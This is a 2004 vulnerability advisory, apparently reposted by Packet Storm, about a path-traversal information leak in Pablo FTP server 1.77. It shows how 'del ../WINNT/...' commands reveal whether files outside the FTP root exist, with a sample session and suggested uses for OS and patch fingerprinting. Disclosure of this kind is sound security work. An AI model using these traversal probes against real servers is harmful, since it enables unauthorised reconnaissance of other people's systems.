Pablo FTP server version 1.77 allows for information disclosure by detecting whether or not a file exists outside of the FTP root directory, allow a remote attack to peruse the system at will.
30472f2da0279acae8a308c9b219bd017b1c9a745f39a30ef1595f0e3ec6872ePablo Sofware Solutions FTP server can detect if a file exists outside the FTP
root directory
.oO Overview Oo.
Pablo Software Solutions FTP server version 1.77 can detect if a file exists
outside the FTP root directory.
Discovered on 2004, January, 11th
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)
Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It
comes with an easy to use interface and can be accessed from the system tray.
The server handles all basic FTP commands and offers easy user account
management and support for virtual directories. This FTP server can detect if
a file exists outside the FTP root directory.
.oO Details Oo.
The vulnerability can be done using the MS-DOS ftp client. When you are logged
on the server, you can send a del \..\<filename> supposed your root directory
is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If
<filename> doesn't exist, the FTP server answers "550 File not found."
In any case, the file is never deleted. That is normal.
.oO Exploit Oo.
Checking if a file exists on a remote system can be usefull to :
* Fingerprint the OS. OSes don't have the same installed files by default.
By this way, you can know if the remote system is Windows NT, or 2000 or
XP...
* Know the vulnerabilities of a system. By testing if
"../WINNT/Q329115.log" exists, you can know if the remote system have this
patch installed
* Maybe some other interesting things...
Here is an example of the vulnerability :
C:\>ftp 127.0.0.1
Connecté à 127.0.0.1.
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp : 85 octets reçus dans 0,00Secondes 84000,00Ko/sec.
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit
.oO Solution Oo.
The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at
http://www.pablovandermeer.nl/ftp_server.html
.oO Discovered by Oo.
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed